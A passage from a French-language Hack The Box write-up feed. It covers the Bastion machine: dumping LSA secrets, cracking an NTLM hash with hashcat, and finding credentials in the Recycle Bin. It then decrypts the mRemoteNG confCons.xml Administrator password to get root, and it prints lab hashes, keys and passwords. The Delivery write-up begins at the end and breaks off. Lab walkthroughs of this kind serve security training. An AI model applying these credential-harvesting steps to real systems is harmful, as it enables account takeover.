class="o">]</span> Dumping LSA Secrets </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DefaultPassword </span></span><span class="line"><span class="cl"><span class="o">(</span>Unknown User<span class="o">)</span>:bureaulampje </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DPAPI_SYSTEM </span></span><span class="line"><span class="cl">dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6 </span></span><span class="line"><span class="cl">dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat-bruteforce">Hashcat bruteforce </h3><p>On a la confirmation que le mot de passe est bien: bureaulampje</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">1000</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">26112010952d963c8dc4217daec986d9:bureaulampje </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-l4mpje">SSH L4mpje </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh L4mpje@10.10.10.134 </span></span><span class="line"><span class="cl">Password: bureaulampje </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.14393<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2016</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">l4mpje@BASTION C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje&gt;whoami </span></span><span class="line"><span class="cl">bastion<span class="se">\l</span>4mpje </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">l4mpje@BASTION C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje&gt;type Desktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">1018.....3717 </span></span></code></pre></td></tr></table> </div> </div><h3 id="recycle-bin---peter-usernamepass">Recycle Bin - Peter username/pass </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; dir -ah </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a-hs- 22-2-2019 13:50 <span class="m">129</span> desktop.ini </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat .<span class="se">\d</span>esktop.ini </span></span><span class="line"><span class="cl"><span class="o">[</span>.ShellClassInfo<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">CLSID</span><span class="o">={</span>645FF040-5081-101B-9F08-00AA002F954E<span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="nv">LocalizedResourceName</span><span class="o">=</span>@%SystemRoot%<span class="se">\s</span>ystem32<span class="se">\s</span>hell32.dll,-8964 </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; Get-ChildItem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">214</span> <span class="nv">$I1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">218</span> <span class="nv">$INTSJCP</span>.bat </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:54 <span class="m">67</span> <span class="nv">$R1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">58</span> <span class="nv">$RNTSJCP</span>.bat </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; Get-ChildItem -Force </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">214</span> <span class="nv">$I1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">218</span> <span class="nv">$INTSJCP</span>.bat </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:54 <span class="m">67</span> <span class="nv">$R1MMX2E</span>.txt </span></span><span class="line"><span class="cl">-a---- 22-2-2019 13:56 <span class="m">58</span> <span class="nv">$RNTSJCP</span>.bat </span></span><span class="line"><span class="cl">-a-hs- 22-2-2019 13:50 <span class="m">129</span> desktop.ini </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$RNTSJCP.bat&#39;</span> </span></span><span class="line"><span class="cl">NET USE Z: <span class="s2">&#34;\\192.168.1.74\Backups&#34;</span> /user:Peter 3RTTT5zNt2 </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; date </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">maandag <span class="m">3</span> maart <span class="m">2025</span> 00:05:57 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$I1MMX2E.txt&#39;</span> </span></span><span class="line"><span class="cl"> C P9c ®ÊÔ<span class="o">]]</span> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl">S t a r t M e n u <span class="se">\ </span>P r o g r a m s <span class="se">\ </span>S t a r t u p <span class="se">\ </span>L <span class="m">4</span> m p j e . b a t . t x t </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$INTSJCP.bat&#39;</span> </span></span><span class="line"><span class="cl"> : </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> : C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> ®ÊÔ_ C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl"> ®®ÊÔ__ C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl">S t a r t M e n u <span class="se">\ </span>P r o g r a m s <span class="se">\ </span>S t a r t u p <span class="se">\ </span>P e t e r - s c r i p t . b a t </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$R1MMX2E.txt&#39;</span> </span></span><span class="line"><span class="cl">NET USE Z: <span class="s2">&#34;\\192.168.1.74\Backups&#34;</span> /user:L4mpje /pass:bureaulampje </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$RNTSJCP.bat&#39;</span> </span></span><span class="line"><span class="cl">NET USE Z: <span class="s2">&#34;\\192.168.1.74\Backups&#34;</span> /user:Peter 3RTTT5zNt2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mremoteng">mRemoteNG </h3><p>En regardant les logiciels installés de plus près, on observe un logiciel intéressant et suspect. Il permet de se connecter à des systèmes en s&rsquo;authentificant avec des mots de passe stocker dans sa configuration.</p> <h3 id="recuperation-du-fichier-de-configuration">Recuperation du fichier de configuration </h3><p>En cherchant sur internet on trouve cette info :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">%APPDATA%<span class="se">\m</span>RemoteNG<span class="se">\c</span>onfCons.xml </span></span></code></pre></td></tr></table> </div> </div><p>Ce fichier semble contenir les mots de passe d&rsquo;après un internaute. Après vérification, on retrouve le hachage du mot de passe de l&rsquo;Administrateur ainsi que celui de L4mpje :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje<span class="se">\A</span>ppdata<span class="se">\R</span>oaming<span class="se">\m</span>RemoteNG&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje<span class="se">\A</span>ppdata<span class="se">\R</span>oaming<span class="se">\m</span>RemoteNG </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 22-2-2019 14:01 Themes </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6316</span> confCons.xml </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6194</span> confCons.xml.20190222-1402277353.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6206</span> confCons.xml.20190222-1402339071.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6218</span> confCons.xml.20190222-1402379227.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6231</span> confCons.xml.20190222-1403070644.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6319</span> confCons.xml.20190222-1403100488.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6318</span> confCons.xml.20190222-1403220026.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6315</span> confCons.xml.20190222-1403261268.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6316</span> confCons.xml.20190222-1403272831.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6315</span> confCons.xml.20190222-1403433299.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6316</span> confCons.xml.20190222-1403486580.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">51</span> extApps.xml </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">5217</span> mRemoteNG.log </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">2245</span> pnlLayout.xml </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje<span class="se">\A</span>ppdata<span class="se">\R</span>oaming<span class="se">\m</span>RemoteNG&gt; cat .<span class="se">\c</span>onfCons.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">&#34;1.0&#34;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>?&gt; </span></span><span class="line"><span class="cl">&lt;mrng:Connections xmlns:mrng<span class="o">=</span><span class="s2">&#34;http://mremoteng.org&#34;</span> <span class="nv">Name</span><span class="o">=</span><span class="s2">&#34;Connections&#34;</span> <span class="nv">Export</span><span class="o">=</span><span class="s2">&#34;false&#34;</span> <span class="nv">EncryptionEngine</span><span class="o">=</span><span class="s2">&#34;AES&#34;</span> <span class="nv">BlockCipherMode</span><span class="o">=</span><span class="s2">&#34;GC </span></span></span><span class="line"><span class="cl"><span class="s2">M&#34;</span> <span class="nv">KdfIterations</span><span class="o">=</span><span class="s2">&#34;1000&#34;</span> <span class="nv">FullFileEncryption</span><span class="o">=</span><span class="s2">&#34;false&#34;</span> <span class="nv">Protected</span><span class="o">=</span><span class="s2">&#34;ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0 </span></span></span><span class="line"><span class="cl"><span class="s2">oop8R8ddXKAx4KK7sAk6AA&#34;</span> <span class="nv">ConfVersion</span><span class="o">=</span><span class="s2">&#34;2.6&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;Node <span class="nv">Name</span><span class="o">=</span><span class="s2">&#34;DC&#34;</span> <span class="nv">Type</span><span class="o">=</span><span class="s2">&#34;Connection&#34;</span> <span class="nv">Descr</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Icon</span><span class="o">=</span><span class="s2">&#34;mRemoteNG&#34;</span> <span class="nv">Panel</span><span class="o">=</span><span class="s2">&#34;General&#34;</span> <span class="nv">Id</span><span class="o">=</span><span class="s2">&#34;500e7d58-662a-44d4-aff0-3a4f547a3fee&#34;</span> Userna </span></span><span class="line"><span class="cl"><span class="nv">me</span><span class="o">=</span><span class="s2">&#34;Administrator&#34;</span> <span class="nv">Domain</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Password</span><span class="o">=</span><span class="s2">&#34;aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==&#34;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> &lt;Node <span class="nv">Name</span><span class="o">=</span><span class="s2">&#34;L4mpje-PC&#34;</span> <span class="nv">Type</span><span class="o">=</span><span class="s2">&#34;Connection&#34;</span> <span class="nv">Descr</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Icon</span><span class="o">=</span><span class="s2">&#34;mRemoteNG&#34;</span> <span class="nv">Panel</span><span class="o">=</span><span class="s2">&#34;General&#34;</span> <span class="nv">Id</span><span class="o">=</span><span class="s2">&#34;8d3579b2-e68e-48c1-8f0f-9ee1347c9128&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nv">Username</span><span class="o">=</span><span class="s2">&#34;L4mpje&#34;</span> <span class="nv">Domain</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Password</span><span class="o">=</span><span class="s2">&#34;yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB&#34;</span> </span></span><span class="line"><span class="cl"> ... </span></span></code></pre></td></tr></table> </div> </div><p>Donc : Administrator : <code>aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==</code></p> <h3 id="déchiffrement-du-hachage-de-ladministrateur">Déchiffrement du hachage de l&rsquo;Administrateur </h3><p>Un outil est dispo sur github pour cracker ce genre de fichier : <a class="link" href="https://github.com/haseebT/mRemoteNG-Decrypt" target="_blank" rel="noopener" >https://github.com/haseebT/mRemoteNG-Decrypt</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bastion/mRemoteNG-Decrypt<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw<span class="o">==</span> </span></span><span class="line"><span class="cl">Password: thXLHM96BeKL0ER2 </span></span></code></pre></td></tr></table> </div> </div><h3 id="connection-en-ssh---root-flag">Connection en SSH - root flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh Administrator@10.10.10.134 </span></span><span class="line"><span class="cl">Administrator@10.10.10.134<span class="err">&#39;</span>s password: ** thXLHM96BeKL0ER2 ** </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.14393<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2016</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">administrator@BASTION C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator&gt;type Desktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">e90b.....42f6 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/delivery-htb/Mon, 24 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/delivery-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Delivery cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Delivery</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.222</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span 